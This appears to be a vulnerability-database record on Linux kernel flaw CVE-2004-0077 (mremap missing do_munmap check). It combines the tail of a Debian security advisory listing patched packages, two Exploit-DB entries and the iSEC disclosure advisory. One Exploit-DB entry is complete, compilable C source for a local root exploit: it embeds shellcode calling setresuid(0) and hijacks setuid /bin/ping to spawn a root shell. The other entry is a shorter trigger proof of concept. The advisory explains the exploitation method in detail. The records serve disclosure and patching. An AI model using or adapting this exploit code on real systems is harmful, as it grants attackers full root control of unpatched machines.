configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n 
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody1.dsc\n Size/MD5 checksum: 672 7bbdd141827b2a7c6e5d3dc0ec1419aa\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody1.diff.gz\n Size/MD5 checksum: 40736 2a4fa2f28b3af1ba4247255cf1cab05d\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz\n Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody3.dsc\n Size/MD5 checksum: 792 767aee163c5c3fccbddf1f917d06488c\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody3.tar.gz\n Size/MD5 checksum: 1020287 80c1f72a99eaf113161c589ec49b06f6\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody1_all.deb\n Size/MD5 checksum: 1782662 b8ade5f98fcb9f3a5627d688467eddcb\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody1_all.deb\n Size/MD5 checksum: 25892640 b22804d26e298f7f02e51d48d31da2dc\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody3_all.deb\n Size/MD5 checksum: 1020394 ba072ba9f904251c7327ccbeedaa8f20\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 3918150 d1d65ee7cfabcf71efc5d06ac78f6319\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 2075108 8f41b6344fe92ba16e69a623c8e3a9b7\n 
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 2075486 e53315d4e51e49d809e83191d945a4f8\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody3_mips.deb\n Size/MD5 checksum: 12842 b65ca394f3fe542c68787794ee5a4337\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-02-27T00:00:00", "published": "2004-02-27T00:00:00", "id": "DEBIAN:DSA-450-1:2B3D9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00047.html", "title": "[SECURITY] [DSA 450-1] New Linux 2.4.19 packages fix several local root exploits (mips)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T11:50:23", "description": "Linux Kernel 2.x mremap missing do_munmap Exploit. CVE-2004-0077. 
Local exploit for linux platform", "published": "2004-03-01T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - \"mremap\" Missing \"do_munmap\" Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0077"], "modified": "2004-03-01T00:00:00", "id": "EDB-ID:160", "href": "https://www.exploit-db.com/exploits/160/", "sourceData": "/*\r\n *\r\n *\tmremap missing do_munmap return check kernel exploit\r\n *\r\n *\tgcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte\r\n *\t./mremap_pte [suid] [[shell]]\r\n *\t\r\n *\tVulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2\r\n *\r\n *\tCopyright (c) 2004 iSEC Security Research. All Rights Reserved.\r\n *\r\n *\tTHIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\"\r\n *\tAND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION\r\n *\tWITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <sched.h>\r\n\r\n#include <sys/mman.h>\r\n#include <sys/wait.h>\r\n#include <sys/utsname.h>\r\n\r\n#include <asm/page.h>\r\n\r\n\r\n#define str(s) #s\r\n#define xstr(s) str(s)\r\n\r\n//\tthis is for standard kernels with 3/1 split\r\n#define STARTADDR\t0x40000000\r\n#define PGD_SIZE\t(PAGE_SIZE * 1024)\r\n#define VICTIM\t\t(STARTADDR + PGD_SIZE)\r\n#define MMAP_BASE\t(STARTADDR + 3*PGD_SIZE)\r\n\r\n#define DSIGNAL\t\tSIGCHLD\r\n#define CLONEFL\t\t(DSIGNAL|CLONE_VFORK|CLONE_VM)\r\n\r\n#define MREMAP_MAYMOVE\t( (1UL) << 0 )\r\n#define MREMAP_FIXED\t( (1UL) << 1 )\r\n\r\n#define __NR_sys_mremap\t__NR_mremap\r\n\r\n\r\n//\thow many ld.so pages? 
this is the .text section length (like cat \t\r\n//\t/proc/self/maps) in pages\r\n#define LINKERPAGES\t0x14\r\n\r\n//\tsuid victim\r\nstatic char *suid=\"/bin/ping\";\r\n\r\n//\tshell to start\r\nstatic char *launch=\"/bin/bash\";\r\n\r\n\r\n_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, \t\t\r\n\t ulong, e);\r\nunsigned long sys_mremap(unsigned long addr, unsigned long old_len, \r\n\t\t\t unsigned long new_len, unsigned long flags, \r\n\t\t\t unsigned long new_addr);\r\n\r\nstatic volatile unsigned base, *t, cnt, old_esp, prot, victim=0;\r\nstatic int i, pid=0;\r\nstatic char *env[2], *argv[2];\r\nstatic ulong ret;\r\n\r\n\r\n//\tcode to appear inside the suid image\r\nstatic void suid_code(void)\r\n{\r\n__asm__(\r\n\t\"\t\tcall\tcallme\t\t\t\t\\n\"\r\n\r\n//\tsetresuid(0, 0, 0), setresgid(0, 0, 0)\r\n\t\"jumpme:\txorl\t%ebx, %ebx\t\t\t\\n\"\r\n\t\"\t\txorl\t%ecx, %ecx\t\t\t\\n\"\r\n\t\"\t\txorl\t%edx, %edx\t\t\t\\n\"\r\n\t\"\t\txorl\t%eax, %eax\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_setresuid)\", %al\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_setresgid)\", %al\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\r\n//\texecve(launch)\r\n\t\"\t\tpopl\t%ebx\t\t\t\t\\n\"\r\n\t\"\t\tandl\t$0xfffff000, %ebx\t\t\\n\"\r\n\t\"\t\txorl\t%eax, %eax\t\t\t\\n\"\r\n\t\"\t\tpushl\t%eax\t\t\t\t\\n\"\r\n\t\"\t\tmovl\t%esp, %edx\t\t\t\\n\"\r\n\t\"\t\tpushl\t%ebx\t\t\t\t\\n\"\r\n\t\"\t\tmovl\t%esp, %ecx\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_execve)\", %al\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\r\n//\texit\r\n\t\"\t\txorl\t%eax, %eax\t\t\t\\n\"\r\n\t\"\t\tmov\t$\"xstr(__NR_exit)\", %al\t\t\\n\"\r\n\t\"\t\tint\t$0x80\t\t\t\t\\n\"\r\n\r\n\t\"callme:\tjmp\tjumpme\t\t\t\t\\n\"\r\n\t);\r\n}\r\n\r\n\r\nstatic int suid_code_end(int v)\r\n{\r\nreturn v+1;\r\n}\r\n\r\n\r\nstatic inline void get_esp(void)\r\n{\r\n__asm__(\r\n\t\"\t\tmovl\t%%esp, %%eax\t\t\t\\n\"\r\n\t\"\t\tandl\t$0xfffff000, %%eax\t\t\\n\"\r\n\t\"\t\tmovl\t%%eax, 
%0\t\t\t\\n\"\r\n\t: : \"m\"(old_esp)\r\n\t);\r\n}\r\n\r\n\r\nstatic inline void cloneme(void)\r\n{\r\n__asm__(\r\n\t\"\t\tpusha\t\t\t\t\t\\n\"\r\n\t\"\t\tmovl $(\"xstr(CLONEFL)\"), %%ebx\t\t\\n\"\r\n\t\"\t\tmovl %%esp, %%ecx\t\t\t\\n\"\r\n\t\"\t\tmovl $\"xstr(__NR_clone)\", %%eax\t\t\\n\"\r\n\t\"\t\tint $0x80\t\t\t\t\\n\"\r\n\t\"\t\tmovl %%eax, %0\t\t\t\t\\n\"\r\n\t\"\t\tpopa\t\t\t\t\t\\n\"\r\n\t: : \"m\"(pid)\r\n\t);\r\n}\r\n\r\n\r\nstatic inline void my_execve(void)\r\n{\r\n__asm__(\r\n\t\"\t\tmovl %1, %%ebx\t\t\t\t\\n\"\r\n\t\"\t\tmovl %2, %%ecx\t\t\t\t\\n\"\r\n\t\"\t\tmovl %3, %%edx\t\t\t\t\\n\"\r\n\t\"\t\tmovl $\"xstr(__NR_execve)\", %%eax\t\\n\"\r\n\t\"\t\tint $0x80\t\t\t\t\\n\"\r\n\t: \"=a\"(ret)\r\n\t: \"m\"(suid), \"m\"(argv), \"m\"(env)\r\n\t);\r\n}\r\n\r\n\r\nstatic inline void pte_populate(unsigned addr)\r\n{\r\nunsigned r;\r\nchar *ptr;\r\n\r\n\tmemset((void*)addr, 0x90, PAGE_SIZE);\r\n\tr = ((unsigned)suid_code_end) - ((unsigned)suid_code);\r\n\tptr = (void*) (addr + PAGE_SIZE);\r\n\tptr -= r+1;\r\n\tmemcpy(ptr, suid_code, r);\r\n\tmemcpy((void*)addr, launch, strlen(launch)+1);\r\n}\r\n\r\n\r\n//\thit VMA limit & populate PTEs\r\nstatic void exhaust(void)\r\n{\r\n//\tmmap PTE donor\r\n\tt = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,\r\n\t\t MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n\tif(MAP_FAILED==t)\r\n\t\tgoto failed;\r\n\r\n//\tprepare shell code pages\r\n\tfor(i=2; i<LINKERPAGES+1; i++)\r\n\t\tpte_populate(victim + PAGE_SIZE*i);\r\n\ti = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);\r\n\tif(i)\r\n\t\tgoto failed;\r\n\r\n//\tlock unmap\r\n\tbase = MMAP_BASE;\r\n\tcnt = 0;\r\n\tprot = PROT_READ;\r\n\tprintf(\"\\n\"); fflush(stdout);\r\n\tfor(;;) {\r\n\t\tt = mmap((void*)base, PAGE_SIZE, prot, \r\n\t\t\t MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n\t\tif(MAP_FAILED==t) {\r\n\t\t\tif(ENOMEM==errno)\r\n\t\t\t\tbreak;\r\n\t\t\telse\r\n\t\t\t\tgoto failed;\r\n\t\t}\r\n\t\tif( !(cnt%512) || cnt>65520 
)\r\n\t\t\tprintf(\"\\r MMAP #%d 0x%.8x - 0x%.8lx\", cnt, base,\r\n\t\t\tbase+PAGE_SIZE); fflush(stdout);\r\n\t\tbase += PAGE_SIZE;\r\n\t\tprot ^= PROT_EXEC;\r\n\t\tcnt++;\r\n\t}\r\n\r\n//\tmove PTEs & populate page table cache\r\n\tret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,\t\r\n\t\t\t MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);\r\n\tif(-1==ret)\r\n\t\tgoto failed;\r\n\r\n\tmunmap((void*)MMAP_BASE, old_esp-MMAP_BASE);\r\n\tt = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, \t\t\r\n\t\t PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, \r\n\t\t 0);\r\n\tif(MAP_FAILED==t)\r\n\t\tgoto failed;\r\n\r\n\t*t = *((unsigned *)old_esp);\r\n\tmunmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));\r\n\tprintf(\"\\n[+] Success\\n\\n\"); fflush(stdout);\r\n\treturn;\r\n\r\nfailed:\r\n\tprintf(\"\\n[-] Failed\\n\"); fflush(stdout);\r\n\t_exit(0);\r\n}\r\n\r\n\r\nstatic inline void check_kver(void)\r\n{\r\nstatic struct utsname un;\r\nint a=0, b=0, c=0, v=0, e=0, n;\r\n\r\n\tuname(&un);\r\n\tn=sscanf(un.release, \"%d.%d.%d\", &a, &b, &c);\r\n\tif(n!=3 || a!=2) {\r\n\t\tprintf(\"\\n[-] invalid kernel version string\\n\");\r\n\t\t_exit(0);\r\n\t}\r\n\r\n\tif(b==2) {\r\n\t\tif(c<=25)\r\n\t\t\tv=1;\r\n\t}\r\n\telse if(b==3) {\r\n\t\tif(c<=99)\r\n\t\t\tv=1;\r\n\t}\r\n\telse if(b==4) {\r\n\t\tif(c>18 && c<=24)\r\n\t\t\tv=1, e=1;\r\n\t\telse if(c>24)\r\n\t\t\tv=0, e=0;\r\n\t\telse\r\n\t\t\tv=1, e=0;\r\n\t}\r\n\telse if(b==5 && c<=75)\r\n\t\tv=1, e=1;\r\n\telse if(b==6 && c<=2)\r\n\t\tv=1, e=1;\r\n\r\n\tprintf(\"\\n[+] kernel %s vulnerable: %s exploitable %s\",\r\n\t\tun.release, v? \"YES\" : \"NO\", e? 
\"YES\" : \"NO\" );\r\n\tfflush(stdout);\r\n\r\n\tif(v && e)\r\n\t\treturn;\r\n\t_exit(0);\r\n}\r\n\r\n\r\nint main(int ac, char **av)\r\n{\r\n//\tprepare\r\n\tcheck_kver();\r\n\tmemset(env, 0, sizeof(env));\r\n\tmemset(argv, 0, sizeof(argv));\r\n\tif(ac>1) suid=av[1];\r\n\tif(ac>2) launch=av[2];\r\n\targv[0] = suid;\r\n\tget_esp();\r\n\r\n//\tmmap & clone & execve\r\n\texhaust();\r\n\tcloneme();\r\n\tif(!pid) {\r\n\t\tmy_execve();\r\n\t} else {\r\n\t\twaitpid(pid, 0, 0);\r\n\t}\r\n\r\nreturn 0;\r\n}\r\n\r\n// milw0rm.com [2004-03-01]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/160/"}, {"lastseen": "2016-01-31T11:49:38", "description": "Linux Kernel \"mremap()\"#2 Local Proof-of-concept. CVE-2004-0077. Local exploit for linux platform", "published": "2004-02-18T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - \"mremap\" Local Proof-of-Concept 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0077"], "modified": "2004-02-18T00:00:00", "id": "EDB-ID:154", "href": "https://www.exploit-db.com/exploits/154/", "sourceData": "/*\r\n * Proof-of-concept exploit code for do_mremap() #2\r\n *\r\n * Copyright (C) 2004 Christophe Devine\r\n *\r\n * This program is free software; you can redistribute it and/or modify\r\n * it under the terms of the GNU General Public License as published by\r\n * the Free Software Foundation; either version 2 of the License, or\r\n * (at your option) any later version.\r\n *\r\n * This program is distributed in the hope that it will be useful,\r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n * GNU General Public License for more details.\r\n *\r\n * You should have received a copy of the GNU General Public License\r\n * along with this program; if not, write to the Free Software\r\n * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n */\r\n\r\n\r\n#include <asm/unistd.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <errno.h>\r\n\r\n\r\n#define MREMAP_MAYMOVE 1\r\n#define MREMAP_FIXED 2\r\n\r\n\r\n#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED\r\n\r\n\r\n#define __NR_real_mremap __NR_mremap\r\n\r\n\r\nstatic inline _syscall5( void *, real_mremap, void *, old_address,\r\n size_t, old_size, size_t, new_size,\r\n unsigned long, flags, void *, new_address );\r\n\r\n\r\n#define VMA_SIZE 0x00003000\r\n\r\n\r\nint main( void )\r\n{\r\n int i, ret;\r\n void *base0;\r\n void *base1;\r\n\r\n\r\n i = 0;\r\n\r\n\r\n while( 1 )\r\n {\r\n i++;\r\n\r\n\r\n ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),\r\n VMA_SIZE, PROT_READ | PROT_WRITE,\r\n MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );\r\n\r\n\r\n if( ret == -1 )\r\n {\r\n perror( \"mmap\" );\r\n break;\r\n }\r\n\r\n\r\n base0 = base1;\r\n base1 = (void *) ret;\r\n }\r\n\r\n\r\n printf( \"created ~%d VMAs\\n\", i );\r\n\r\n\r\n base0 += 0x1000;\r\n base1 += 0x1000;\r\n\r\n\r\n printf( \"now mremapping 0x%08X at 0x%08X\\n\",\r\n (int) base1, (int) base0 );\r\n\r\n\r\n real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );\r\n\r\n\r\n printf( \"kernel may not be vulnerable\\n\" );\r\n\r\n\r\n return( 0 );\r\n}\r\n\r\n\r\n// milw0rm.com [2004-02-18]\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/154/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0077"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSynopsis: Linux kernel do_mremap VMA limit local 
privilege escalation\r\n vulnerability\r\nProduct: Linux kernel\r\nVersion: 2.2 up to and including 2.2.25, 2.4 up to and including 2.4.24, \r\n 2.6 up to and including 2.6.2\r\nVendor: http://www.kernel.org/\r\nURL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\r\nCVE: CAN-2004-0077\r\nAuthor: Paul Starzetz <ihaquer@isec.pl>\r\nDate: March 1, 2004\r\n\r\n\r\nIssue:\r\n======\r\n\r\nA critical security vulnerability has been found in the Linux kernel memory \r\nmanagement code inside the mremap(2) system call due to missing function return \r\nvalue check. This bug is completely unrelated to the mremap bug disclosed on \r\n05-01-2004 except concerning the same internal kernel function code.\r\n\r\n\r\nDetails:\r\n========\r\n\r\nThe Linux kernel manages a list of user addressable valid memory locations on a \r\nper process basis. Every process owns a single linked list of so called virtual \r\nmemory area descriptors (called from now on just VMAs). Every VMA describes the \r\nstart of a valid memory region, its length and moreover various memory flags \r\nlike page protection. \r\n\r\nEvery VMA in the list corresponds to a part of the process's page table. The \r\npage table contains descriptors (in short page table entries PTEs) of physical \r\nmemory pages seen by the process. 
The VMA descriptor can be thus understood as a \r\nhigh level description of a particular region of the process's page table \r\nstoring PTE properties like page R/W flag and so on.\r\n\r\nThe mremap() system call provides resizing (shrinking or growing) as well as \r\nmoving of existing virtual memory areas or any of its parts across process's \r\naddressable space.\r\n\r\nMoving a part of the virtual memory from inside a VMA area to a new location \r\nrequires creation of a new VMA descriptor as well as copying the underlying page \r\ntable entries described by the VMA from the old to the new location in the \r\nprocess's page table.\r\n\r\nTo accomplish this task the do_mremap code calls the do_munmap() internal kernel \r\nfunction to remove any potentially existing old memory mapping in the new \r\nlocation as well as to remove the old virtual memory mapping. Unfortunately the \r\ncode doesn't test the return value of the do_munmap() function which may fail if \r\nthe maximum number of available VMA descriptors has been exceeded. This happens \r\nif one tries to unmap middle part of an existing memory mapping and the \r\nprocess's limit on the number of VMAs has been reached (which is currently \r\n65535).\r\n\r\nOne of the possible situations can be illustrated with the following picture. 
\r\nThe corresponding page table entries (PTEs) have been marked with o and x:\r\n\r\nBefore mremap():\r\n\r\n(oooooooooooooooooooooooo) (xxxxxxxxxxxx)\r\n[----------VMA1----------] [----VMA2----]\r\n [REMAPPED-VMA] <---------------|\r\n\r\n\r\nAfter mremap() without VMA limit:\r\n\r\n(oooo)(xxxxxxxxxxxx)(oooo)\r\n[VMA3][REMAPPED-VMA][VMA4]\r\n\r\n\r\nAfter mremap() but VMA limit:\r\n\r\n(ooooxxxxxxxxxxxxxxoooo)\r\n[---------VMA1---------]\r\n [REMAPPED-VMA]\r\n\r\n\r\nAfter the maximum number of VMAs in the process's VMA list has been reached \r\ndo_munmap() will refuse to create the necessary VMA hole because it would split \r\nthe original VMA in two disjoint VMA areas exceeding the VMA descriptor limit.\r\n\r\nDue to the missing return value check after trying to unmap the middle of the \r\nVMA1 (this is the first invocation of do_munmap inside do_mremap code) the \r\ncorresponding page table entries from VMA2 are still inserted into the page \r\ntable location described by VMA1 thus being subject to VMA1 page protection \r\nflags. It must be also mentioned that the original PTEs in the VMA1 are lost \r\nthus leaving the corresponding page frames unusable for ever.\r\n\r\nThe kernel also tries to insert the overlapping VMA area into the VMA descriptor \r\nlist but this fails due to further checks in the low level VMA manipulation \r\ncode. The low level VMA list check in the 2.4 and 2.6 kernel versions just call \r\nBUG() therefore terminating the malicious process.\r\n\r\nThere are also two other unchecked calls to do_munmap() inside the do_mremap() \r\ncode and we believe that the second occurrence of unchecked do_munmap is also \r\nexploitable. The second occurrence takes place if the VMA to be remapped is \r\nbeing truncated in place. 
Note that do_munmap can also fail on an exceptional \r\nlow memory condition while trying to allocate a VMA descriptor.\r\n\r\n\r\nExploitation:\r\n=============\r\n\r\nThe vulnerability turned out to be very easily exploitable. Our first guess was \r\nto move PTEs from one VMA mapping a read-only file (like /etc/passwd) to another \r\nwriteable VMA. This approach failed because after the BUG() macro has been \r\ninvoked the mmap semaphore of the memory descriptor is left in a closed (that is \r\ndown_write()) state thus preventing any further memory operations which acquire \r\nthe semaphore in other clone threads.\r\n\r\nSo our attention came over the page table cache code which was introduced early \r\nin the 2.4 series but not enabled by default. Kernels later than the 2.4.19 \r\nenable the page table cache. The basic idea of a page table cache is to keep \r\nfree page frames recently used for the page tables in a linked list to speed up \r\nthe allocation of new page tables.\r\n\r\nOn Linux every process owns a reference to a memory descriptor (mm_struct) which \r\ncontains a pointer to a page directory. The page directory is a single page \r\nframe (we describe the 4kb sized pages case without PAE) containing 1024 \r\npointers to the page tables. A single page table page on the i386 architecture \r\nholds 1024 PTEs describing up to 4MB of process's virtual memory. A single PTE \r\ncontains the physical address of the page mapped at the PTE's virtual address \r\nand the page access rights.\r\n\r\nThe page tables are allocated on demand if a page fault occurs. They are also \r\nfreed and the corresponding page frames released to the memory manager if a \r\nprocess unmaps parts of its virtual memory spanning at least one page table page \r\nthat is a region containing at least a 4MB sized and 4MB aligned memory area.\r\n\r\nThere are two paths if a new page table must be allocated: the slow and the fast \r\none. 
The fast path takes one page from the head of the page table cache while \r\nthe slow one just calls get_free_page(). This works well if the pages from the \r\npage table cache have been properly cleared before inserting them into the \r\ncache. Normally the page tables are cleared by zap_page_range() which is called \r\nfrom do_munmap. It is very important for the proper operation of the Linux \r\nmemory management that all locations of the process's page table actually \r\ncontaining a valid PTE are covered by the corresponding VMA descriptor.\r\n\r\nIn the case of the unchecked do_munmap inside the mremap code we have found a \r\ncondition leaving a part of the page table uncovered by a VMA. The offending \r\ncode is:\r\n\r\n[269] if (old_len >= new_len) {\r\n do_munmap(current->mm, addr+new_len, old_len - new_len);\r\n if (!(flags & MREMAP_FIXED) || (new_addr == addr))\r\n goto out;\r\n }\r\n\r\nThis piece of code is responsible for truncating the VMA the user wants to remap \r\nin place. It can be easily seen that do_munmap will fail if [addr+new_len, \r\naddr+new_len + (old_len-new_len)] goes into the middle of a VMA and the maximum \r\nnumber of allowed VMA descriptors has been already used by the process. That \r\nmeans also that the page table will still contain valid PTEs from addr+new_len \r\non. Later in the mremap code a part of the corresponding VMA is moved and \r\ntruncated:\r\n\r\n[179] if (!move_page_tables(current->mm, new_addr, addr, old_len)) {\r\n unsigned long vm_locked = vma->vm_flags & VM_LOCKED;\r\n\r\n if (allocated_vma) {\r\n *new_vma = *vma;\r\n new_vma->vm_start = new_addr;\r\n new_vma->vm_end = new_addr+new_len;\r\n new_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT;\r\n\r\nbut more PTEs (namely old_len) than the length of the created VMA are moved from \r\nthe old location if a new location has been specified along with the \r\nMREMAP_MAYMOVE flag. This works well only if the previous do_munmap did not \r\nfail. 
This situation can be illustrated as follows:\r\n\r\nbefore mremap:\r\n\r\n <-- old_len -->\r\n(oooooooooooooooooooooooooooo)\r\n[------|-----VMA1-----|------]\r\n |---------------------------------> new_addr\r\n\r\n\r\nafter mremap, no VMA limit:\r\n new_len\r\n(oooooo) (oooooo) (oooooo)\r\n[-VMA1-] [-VMA3-] [-VMA2-]\r\n\r\n\r\nafter mremap but VMA limit:\r\n new_len [*]\r\n(oooooo oooooo) (oooooo)ooooooooo\r\n[-----------VMA1-------------] [-VMA2-]\r\n\r\n\r\nThose [*] 'ownerless' PTE entries in the page table can be further exploited \r\nsince the memory manager has lost track of them. If the process now unmaps a \r\nsufficiently big area of memory covering those ownerless PTEs, the underlying \r\npage table frame will be inserted into the page table cache but will still \r\ncontain valid PTEs. That means that on the next page table frame allocation \r\ninside process P for an address A our PTEs will appear in the page table of the \r\nprocess P! If that process tries to access the virtual memory at the address A \r\nthere also won't be a page fault if the PTEs have appropriate (read or write) \r\naccess rights. In other words: through the page table cache we are able to \r\ninsert any data into the virtual memory space of another process.\r\n\r\nOur code takes the way through a setuid binary, however this is not the only \r\npossibility. We prepare the page table cache so that there is a single empty \r\npage frame in front of the cache and then a special page table containing 'self \r\nexecuting' pages. To fully understand how it works we must dig into the execve() \r\nsystem call.\r\n\r\nIf a user calls execve() the kernel removes all traces of the current \r\nexecutable including the virtual memory areas and page tables allocated to the \r\nprocess. Then a new VMA for the stack on top of the virtual memory is created \r\nwhere the program environment and arguments to the new binary are stored (they \r\nhave been preserved in kernel memory). 
This causes a first page table frame to \r\nbe allocated for the virtual memory region ranging from 0xbfc00000-0xc0000000.\r\n\r\nNext, the .text and .data sections of the binary to be executed as well as the \r\nprogram interpreter responsible for further loading are mapped into the fresh \r\nvirtual memory space. For the ELF linking format this is usually the ld.so \r\ndynamic linker. At this point the kernel does not allocate the underlying page \r\ntables. Only VMA descriptors are inserted into the process's VMA list.\r\n\r\nAfter doing some more work not important for the following the kernel transfers \r\ncontrol to the dynamic linker to execute the binary. This causes a second page \r\nfault and triggers demand loading of the first code page of the dynamic linker. \r\nOn a standard Linux kernel this will also allocate a page frame for the page \r\ntable ranging from 0x40000000 to 0x40400000.\r\n\r\nOn a kernel with page table cache enabled both allocations will take page frames \r\nfrom the cache first. That means that if the second page in the cached page list \r\ncontains valid PTEs those could appear instead of the regular dynamic linker \r\ncode. It is easy to place the PTEs so that they will shadow the code section of \r\nthe dynamic linker. Note that the first PTE entry of a page is used by the cache \r\ncode to maintain the page list. In our code we populate the page table cache \r\nwith special frames containing PTEs to pages with a short shell code at the end \r\nof the page and fill the pages with a NOP landing zone.\r\n\r\nWe must also mention that the first mremap hole disclosed on 05-01-2004 can be \r\nalso very easily exploited through the page table cache. Details are left for \r\nthe skilled reader. 
\r\n\r\nA second possibility to exploit the mremap bug is to create another VMA covering \r\nownerless PTEs from a read-only file like /etc/passwd.\r\n\r\n\r\nImpact:\r\n=======\r\n\r\nSince no special privileges are required to use the mremap(2) system call any \r\nprocess may use its unexpected behavior to disrupt the kernel memory management \r\nsubsystem.\r\n\r\nProper exploitation of this vulnerability leads to local privilege escalation \r\ngiving an attacker full super-user privileges. The vulnerability may also lead \r\nto a denial-of-service attack on the available system memory.\r\n\r\nTested and known to be vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 \r\nand <= 2.6.2. The 2.2.25 version of Linux kernel does not recognize the \r\nMREMAP_FIXED flag but this does not prevent the bug from being successfully \r\nexploited. All users are encouraged to patch all vulnerable systems as soon as \r\nappropriate vendor patches are released. There is no hotfix for this \r\nvulnerability. Limited per user virtual memory still permits do_munmap() to \r\nfail.\r\n\r\n\r\nCredits:\r\n========\r\n\r\nPaul Starzetz <ihaquer@isec.pl> has identified the vulnerability and performed \r\nfurther research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION \r\nPRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS.\r\n\r\n\r\nDisclaimer:\r\n===========\r\n\r\nThis document and all the information it contains are provided "as is", for \r\neducational purposes only, without warranty of any kind, whether express or \r\nimplied.\r\n\r\nThe authors reserve the right not to be responsible for the topicality, \r\ncorrectness, completeness or quality of the information provided in this \r\ndocument. 
